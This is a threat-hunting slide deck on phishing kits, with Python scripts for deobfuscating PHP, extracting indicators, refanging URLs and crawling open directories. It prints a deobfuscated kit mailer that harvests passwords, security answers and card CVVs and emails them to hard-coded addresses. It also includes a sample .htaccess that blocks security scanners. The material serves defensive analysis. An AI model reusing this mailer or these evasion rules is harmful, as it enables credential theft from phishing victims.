Hunting Phish Kits

Josh Rickard

Blue Team
DFIR

Automate all the things

Open Sorcerer

@MSAdministrator

I like long walks through binary trees, #Python & #PowerShell riding, holding hands with Microsoft, writing romantic experiences about code, git prune all the branches, and deep sea #phishing

What is a Phish Kit?

Deployable Web App(s)

A bundle of web files (HTML/PHP pages cloned from the target, images, .htaccess rules, mailer scripts) that an attacker unpacks on a web server to stand up a credential-harvesting page and forward whatever victims submit.


backdooring

Kit authors commonly plant an obfuscated block in the kit so that a copy of every capture also goes to them, hidden from the operator who downloaded or bought it. The usual shape is a nested decoder chain around an eval():

eval(str_rot13(gzinflate(str_rot13(base64_decode('...')))));   (base64 payload omitted)
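The chain on the slide can be unwrapped statically instead of running it through PHP. The script below is an added example for this page (not the talk's code and not from any kit): it parses the function chain wrapped around the string literal, applies the Python equivalent of each PHP decoder from the innermost outwards, and repeats while the result is itself another eval() layer. Because the slide's payload is not reproduced here, build_sample() constructs an encoded input from a known plaintext using the same chain.

```python
"""Statically unwrap nested PHP decoder chains such as
eval(str_rot13(gzinflate(str_rot13(base64_decode('...'))))) without executing PHP.
Added example for this page; not code from the talk or from any kit."""
import base64
import re
import zlib
from urllib.parse import unquote_to_bytes


def php_str_rot13(data: bytes) -> bytes:
    """PHP's str_rot13 rotates ASCII letters only; every other byte passes through."""
    out = bytearray()
    for b in data:
        if 65 <= b <= 90:
            out.append((b - 65 + 13) % 26 + 65)
        elif 97 <= b <= 122:
            out.append((b - 97 + 13) % 26 + 97)
        else:
            out.append(b)
    return bytes(out)


# Python equivalents of the PHP helpers kits chain together, keyed by PHP name.
DECODERS = {
    "base64_decode": base64.b64decode,
    "str_rot13": php_str_rot13,
    "gzinflate": lambda d: zlib.decompress(d, -15),   # raw DEFLATE, no header
    "gzuncompress": lambda d: zlib.decompress(d),     # zlib-wrapped
    "gzdecode": lambda d: zlib.decompress(d, 31),     # gzip-wrapped
    "strrev": lambda d: d[::-1],
    "urldecode": unquote_to_bytes,
}

# eval( f1( f2( ... ('<literal>') ... ) ) );  group 1 = function chain, group 3 = literal
CHAIN_RE = re.compile(
    r"""eval\s*\(\s*((?:[A-Za-z0-9_]+\s*\(\s*)+)(['"])([^'"]*)\2\s*\)+\s*;?""", re.S
)


def unwrap(source: str, max_layers: int = 25):
    """Peel eval() layers inside-out. Returns (final_code, applied) where applied holds,
    per layer, the decoder names in the order they were applied."""
    code, applied = source, []
    for _ in range(max_layers):
        m = CHAIN_RE.search(code)
        if not m:
            break
        names = re.findall(r"[A-Za-z0-9_]+", m.group(1))  # outermost first
        order = list(reversed(names))                       # innermost decoder runs first
        data = m.group(3).encode("latin-1")
        for name in order:
            if name not in DECODERS:
                raise ValueError(f"unsupported decoder in chain: {name}")
            data = DECODERS[name](data)
        code = data.decode("utf-8", errors="replace")
        applied.append(order)
    return code, applied


def build_sample(plaintext: bytes) -> str:
    """Constructed test input: encode PHP exactly the way the slide's chain expects."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    deflated = c.compress(php_str_rot13(plaintext)) + c.flush()
    blob = base64.b64encode(php_str_rot13(deflated)).decode()
    return f"<?php eval(str_rot13(gzinflate(str_rot13(base64_decode('{blob}'))))); ?>"


if __name__ == "__main__":
    # two layers deep, as kits sometimes ship
    layered = build_sample(build_sample(b"mail('drop@example.invalid', $subj, $data);").encode())
    code, applied = unwrap(layered)
    print(code)
    for i, layer in enumerate(applied, 1):
        print(f"layer {i}: {' -> '.join(layer)}")
```

Any decoder not in the table raises rather than silently skipping, which is the behaviour you want when a kit author has swapped in a custom helper: the unresolved name tells you what to add.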

 

Deobfuscated Code

$user = $_SESSION['username'];
$pass = $_SESSION['password'];
$q1 = $_SESSION['question1'];
$a1 = $_SESSION['answer1'];
$q2 = $_SESSION['question2'];
$a2 = $_SESSION['answer2'];
$q3 = $_SESSION['question3'];
$a3 = $_SESSION['answer3'];
$dob = $_SESSION['dob'];
$exp = $_SESSION['exp'];
$cvv = $_SESSION['cvv'];

// Victim IP: the client-supplied Client-IP header is trusted before REMOTE_ADDR,
// so the logged address is whatever the visitor chooses to send
if (getenv('HTTP_CLIENT_IP')) {
    $ip = getenv('HTTP_CLIENT_IP');
} else {
    $ip = getenv('REMOTE_ADDR');
}
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);   // resolved but never used below
$browser = $_SERVER['HTTP_USER_AGENT'];

$data = "---------------------bmr---------------------
User: $user
Pass: $pass
-
Q1 : $q1
A1 : $a1

Q2 : $q2
A2 : $a2
Q3 : $q3
A3 : $a3

dob: $dob
exp: $exp
cvv: $cvv

-
Browser: $browser
 IP: $ip
---------------------BMO---------------------
";

// Hard-coded recipients of every capture (the second is a bare domain, as found in the kit)
$un = "multic62@yandex.com";
$do = "sco314159265395.com";
$tr = "fi5319624@gmail.com";

$subj = "Bmer $user#$pass#";
if ($_SESSION['username'] != "") {
    mail($un, $subj, $data);
    mail($do, $subj, $data);
    mail($tr, $subj, $data);
}


img/

  • Ship the cloned site's images locally, so the phishing page makes fewer requests back to the original site (which could log or block them)
  • Keep the page rendering the same even if the real site changes its assets ("backwards compatibility")
  • Confirmation pages in particular need the exact images to match the experience the victim expects

htaccess

  • Blocking entire CIDR blocks or specific IPs
  • Redirecting based on user-agent string used

robots.txt

  • Disallow access to specific directories
  • Sometimes also used to block specific user-agent strings
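The .htaccess and robots.txt rules are themselves worth recording: the ranges and user-agent strings a kit blocks tell you which scanners its author worried about, and they change between versions. The script below is an added example for this page, not the talk's code; it parses Deny-from lines (including Apache's partial dotted prefixes such as "66.249."), RewriteCond user-agent conditions, and robots.txt groups into structured rules you can diff or test your own crawler against. The two inputs are constructed samples shaped like what kits ship, using documentation address ranges rather than a real blocklist.

```python
"""Extract the anti-analysis rules from a kit's .htaccess and robots.txt so the blocked
ranges and user-agent patterns can be recorded and compared across kit versions.
Added example for this page, not the talk's code; inputs are constructed samples."""
import ipaddress
import re

SAMPLE_HTACCESS = """\
# constructed sample, not from a real kit
Order Allow,Deny
Deny from 66.249.
Deny from 192.0.2.0/24 198.51.100.7
Allow from all
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot|phishtank|virustotal|wget|curl) [NC]
RewriteRule .* - [F,L]
"""

SAMPLE_ROBOTS = """\
# constructed sample
User-agent: *
Disallow: /login/
Disallow: /img/
User-agent: Googlebot
Disallow: /
"""


def apache_deny_to_network(token):
    """'Deny from' takes a full address, a CIDR, or a partial dotted prefix such as
    '66.249.' which Apache treats as 66.249.0.0/16."""
    if "/" in token or ":" in token:
        return ipaddress.ip_network(token, strict=False)
    octets = [o for o in token.split(".") if o]
    if len(octets) < 4:
        token = ".".join(octets + ["0"] * (4 - len(octets))) + f"/{8 * len(octets)}"
    return ipaddress.ip_network(token, strict=False)


def parse_htaccess(text):
    """Return (blocked_networks, compiled_user_agent_patterns)."""
    networks, ua_patterns = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"deny\s+from\s+(.+)$", line, re.I)
        if m:
            networks += [apache_deny_to_network(t) for t in m.group(1).split() if t.lower() != "all"]
            continue
        m = re.match(r"RewriteCond\s+%\{HTTP_USER_AGENT\}\s+(\S+)(?:\s+\[([^\]]*)\])?", line, re.I)
        if m:
            flags = re.I if "NC" in (m.group(2) or "").upper() else 0   # [NC] = case-insensitive
            ua_patterns.append(re.compile(m.group(1).strip('"'), flags))
    return networks, ua_patterns


def parse_robots(text):
    """Map each User-agent group to its Disallow paths; consecutive User-agent lines share a group."""
    rules, agents, prev_was_agent = {}, [], False
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if key == "user-agent":
            agents = agents + [value] if prev_was_agent else [value]
            rules.setdefault(value, [])
        elif key == "disallow" and value:
            for a in agents:
                rules[a].append(value)
        prev_was_agent = key == "user-agent"
    return rules


def is_blocked(ip, networks):
    """Would a visitor from this address be denied by the kit's .htaccess?"""
    addr = ipaddress.ip_address(ip)
    return any(addr.version == n.version and addr in n for n in networks)


def ua_blocked(user_agent, ua_patterns):
    """Would this User-Agent string trip one of the RewriteCond rules?"""
    return any(p.search(user_agent) for p in ua_patterns)


if __name__ == "__main__":
    nets, uas = parse_htaccess(SAMPLE_HTACCESS)
    print("blocked:", [str(n) for n in nets])
    print("UA patterns:", [p.pattern for p in uas])
    print("robots:", parse_robots(SAMPLE_ROBOTS))
```

Run your own crawler's source IP and User-Agent through is_blocked() and ua_blocked() before fetching: if either returns True for a kit you already hold, the live copy will serve you a redirect or a 403 instead of the real page.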


antibots.php

card validation

logs!

Warez Kits

  • Lots of goodies found here

 

  • PowerShell
  • EXEs
  • MSIs
  • DLLs
  • BINs
  • PDFs
  • DOCXs
  • LNKs
  • APKs

BENIES

IOCs are not dead

  • IOCs are still valuable for active defense, but TTPs are better for long-term defensive measures

 

  • PhishKit Names & Versions

  • Email Addresses being used to forward captured content

  • Logs

  • Specific hosting providers

    • WHOIS/RDAP info

  • If you keep seeing the same kit variant, you can also track how its defensive measures (blocklists, anti-bot checks) change over time, which in turn helps improve your own tooling
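Once a kit's mailer is deobfuscated, the recipient addresses and harvested fields can be pulled out mechanically instead of by eye. The script below is an added example for this page, not the talk's code. SAMPLE_KIT is constructed from the deobfuscated fragment shown earlier on the slides; the variable resolution deliberately handles only string literals and variables assigned from literals, which is what kit mailers typically use, and reports anything else as unresolved rather than guessing.

```python
"""Static triage of a kit's PHP mailer: the hard-coded exfiltration recipients, the
request/session fields it harvests, and the mail() subject template.
Added example for this page, not the talk's code; SAMPLE_KIT is constructed."""
import re

SAMPLE_KIT = r"""<?php
$user = $_SESSION['username'];
$pass = $_SESSION['password'];
$dob = $_SESSION['dob'];
$cvv = $_SESSION['cvv'];
$ip = getenv('REMOTE_ADDR');
$data = "User: $user\nPass: $pass\ndob: $dob\ncvv: $cvv\nIP: $ip\n";
$un = "multic62@yandex.com";
$do = "sco314159265395.com";
$tr = "fi5319624@gmail.com";
$subj = "Bmer $user#$pass#";
if ($_SESSION['username'] != "") {
    mail($un,$subj,$data);
    mail($do,$subj,$data);
    mail($tr,$subj,$data);
}
"""

ASSIGN_RE = re.compile(r"""\$(\w+)\s*=\s*(['"])(.*?)\2\s*;""", re.S)   # $var = "literal";
MAIL_RE = re.compile(r"\bmail\s*\(\s*([^,]+?)\s*,\s*([^,]+?)\s*,", re.S)  # mail(to, subject, ...
FIELD_RE = re.compile(r"""\$_(SESSION|POST|GET|REQUEST|COOKIE)\[\s*['"](\w+)['"]\s*\]""")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def resolve(expr, consts):
    """Resolve a mail() argument: a string literal, or a $var assigned from a literal."""
    expr = expr.strip()
    m = re.fullmatch(r"""(['"])(.*)\1""", expr, re.S)
    if m:
        return m.group(2)
    m = re.fullmatch(r"\$(\w+)", expr)
    if m and m.group(1) in consts:
        return consts[m.group(1)]
    return f"<unresolved:{expr}>"


def triage(source):
    """Return the indicators a hunter records from one mailer file."""
    consts = {name: value for name, _, value in ASSIGN_RE.findall(source)}
    recipients, subjects = [], []
    for to_expr, subj_expr in MAIL_RE.findall(source):
        recipients.append(resolve(to_expr, consts))
        subjects.append(resolve(subj_expr, consts))
    fields = sorted({f"{src}[{name}]" for src, name in FIELD_RE.findall(source)})
    return {
        "recipients": recipients,
        "valid_emails": [r for r in recipients if EMAIL_RE.fullmatch(r)],  # bare domains are not deliverable as-is
        "subjects": sorted(set(subjects)),
        "fields": fields,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_KIT).items():
        print(f"{key}: {value}")
```

The subject template is worth keeping alongside the addresses: kit families tend to reuse the same prefix ("Bmer" above) across versions, so it pivots between samples even when the drop addresses rotate.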

catchin kitz

simplified phishing response workflow


pre-filtered sources

raw sources

#opendir || opendir

#phishkit || phishkit

#phishingkit || phishingkit

#opendir

/some[.]domain[.]com/phish/path

some.domain[.com//phish//path

hxxps://some.domain[.]com/phish/path

hXXp://some.domain.com/

http://some.domain.com/
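Sightings arrive in all of the defanged forms above, and the same URL shared five ways should collapse to one fetch. The script below is an added example for this page, not the talk's code: refang() undoes the usual bracket, "dot" and hxxp tricks (including the unbalanced "[." in the second form), assumes http when no scheme was given, normalises host case and doubled slashes, and defang() reverses it for re-sharing. SIGHTINGS reproduces the forms listed on the slide.

```python
"""Refang the defanged URL forms people post when sharing kit sightings so they can be
fetched and deduplicated, and defang again for re-sharing.
Added example for this page, not the talk's code; SIGHTINGS mirrors the slide."""
import re
from urllib.parse import urlsplit, urlunsplit

SIGHTINGS = [
    "/some[.]domain[.]com/phish/path",
    "some.domain[.com//phish//path",
    "hxxps://some.domain[.]com/phish/path",
    "hXXp://some.domain.com/",
    "http://some.domain.com/",
]


def refang(raw, default_scheme="http"):
    """Undo the common defanging tricks and normalise scheme, host case and path."""
    s = raw.strip()
    s = re.sub(r"^h[x]{2}p(s?)\s*:\s*/\s*/", r"http\1://", s, flags=re.I)  # hxxp://, hXXps://
    s = re.sub(r"\[(?:\.|dot)\]|\((?:\.|dot)\)|\{\.\}", ".", s, flags=re.I)  # [.] (.) [dot] {.}
    s = re.sub(r"\[\.|\.\]", ".", s)                                         # unbalanced [. or .]
    if "://" not in s:
        s = f"{default_scheme}://{s.lstrip('/')}"   # bare host/path: assume http
    parts = urlsplit(s)
    path = re.sub(r"/{2,}", "/", parts.path) or "/"  # collapse // in the path, keep a root slash
    return urlunsplit((parts.scheme.lower(), parts.netloc.lower(), path, parts.query, parts.fragment))


def defang(url):
    """Reverse of refang for sharing: hxxp scheme and bracketed dots in the host."""
    parts = urlsplit(url)
    return urlunsplit((parts.scheme.replace("http", "hxxp"), parts.netloc.replace(".", "[.]"),
                       parts.path, parts.query, parts.fragment))


def normalise_sightings(items):
    """Refang every sighting and return the unique URLs, sorted."""
    return sorted({refang(i) for i in items})


if __name__ == "__main__":
    for url in normalise_sightings(SIGHTINGS):
        print(url, "->", defang(url))
```

Note that http and https forms are kept separate on purpose: a kit is often reachable on only one of the two, so both are tried rather than merged.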

finding & generating paths

  1. Identify the root of the site
  2. Download the content at that URL
  3. Check whether the page title contains "Index Of" (an open directory listing)
    1. Parse every <a href> link into files and folders (skip the parent-directory and column-sort links)
    2. Add files to the file list (and to the master list)
    3. Append each folder to the current URL path (and add it to the master list)
    4. Repeat from step 2 for each new folder
  4. For each folder in the path list, append .zip to the folder name (kit archives are often left next to the unpacked kit)
    1. Add to the master list
  5. Attempt to download every file in the master list, filtered by extension preference
  6. Profit?
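The workflow above as a runnable crawler, added as an example for this page (it is not the trawl project's code). It takes a fetch(url) callable that returns the page body or None, so that it runs offline here against FAKE_SITE, a constructed set of listings; in real use fetch would wrap an HTTP client with a timeout, run from an isolated analysis box, and the file set would be written out rather than printed. The parent-directory and "?C=N;O=D" column-sort links that every Apache listing carries are skipped explicitly, otherwise the crawl loops.

```python
"""Enumerate an 'Index of' open directory: start at the root, parse every <a href>,
recurse into listed folders, queue a <folder>.zip guess per folder, then pick files by
extension. Added example for this page, not trawl's code; FAKE_SITE is constructed."""
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

FAKE_SITE = {  # constructed sample pages keyed by URL; fetch = FAKE_SITE.get
    "http://example.invalid/": (
        "<html><head><title>Index of /</title></head><body>"
        "<a href='?C=N;O=D'>Name</a><a href='../'>Parent Directory</a>"
        "<a href='login/'>login/</a><a href='secure.zip'>secure.zip</a></body></html>"
    ),
    "http://example.invalid/login/": (
        "<title>Index of /login</title><a href='../'>Parent Directory</a>"
        "<a href='img/'>img/</a><a href='css/'>css/</a>"
        "<a href='index.php'>index.php</a><a href='antibots.php'>antibots.php</a>"
    ),
    "http://example.invalid/login/img/": (
        "<title>Index of /login/img</title><a href='../'>..</a><a href='logo.png'>logo.png</a>"
    ),
    "http://example.invalid/login/css/": "<title>403 Forbidden</title><h1>Forbidden</h1>",
}


class LinkExtractor(HTMLParser):
    """Collect the <title> text and every <a href> value on a page."""

    def __init__(self):
        super().__init__()
        self.title, self.links, self._in_title = "", [], False

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True
        elif tag == "a":
            self.links += [v for k, v in attrs if k == "href" and v]

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def enumerate_opendir(root, fetch, max_pages=500):
    """Return (files, folders, zip_guesses) as sets of absolute URLs."""
    root = root if root.endswith("/") else root + "/"
    files, folders, zips, seen = set(), set(), set(), set()
    queue = deque([root])
    while queue and len(seen) < max_pages:
        url = queue.popleft()
        if url in seen:
            continue
        seen.add(url)
        html = fetch(url)
        if html is None:
            continue
        page = LinkExtractor()
        page.feed(html)
        if "index of" not in page.title.lower():   # step 3: not a listing, go no deeper
            continue
        folders.add(url)
        if urlparse(url).path not in ("", "/"):    # step 4: guess <folder>.zip for each folder
            zips.add(url.rstrip("/") + ".zip")
        for href in page.links:
            if href.startswith(("?", "#")):         # column-sort and anchor links
                continue
            target = urljoin(url, href)
            if not target.startswith(url) or target == url:   # parent directory or off-site
                continue
            if target.endswith("/"):
                queue.append(target)
            else:
                files.add(target)
    return files, folders, zips


def select_downloads(files, extensions):
    """Step 5: keep only the extensions worth pulling, e.g. {'.zip', '.php', '.txt'}."""
    return sorted(f for f in files if f.lower().endswith(tuple(extensions)))


if __name__ == "__main__":
    files, folders, zips = enumerate_opendir("http://example.invalid", FAKE_SITE.get)
    print("folders:", sorted(folders))
    print("zip guesses:", sorted(zips))
    print("to download:", select_downloads(files | zips, {".zip", ".php"}))
```

The .zip guesses are attempted as downloads alongside the listed files; a 404 on the guess costs one request, while a hit gives you the whole kit in one archive including files the listing never showed.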


open-source tools

kthxbye

twitter: @MSAdministrator

github: https://github.com/MSAdministrator

p-blog: https://letsautomate.it

w-blog: https://swimlane.com/blog

trawl: https://github.com/swimlane/trawl

slides: https://letsautomate.it/presentations/hunting-for-phishkits.html#/

                         (slides will be up sometime this week/end)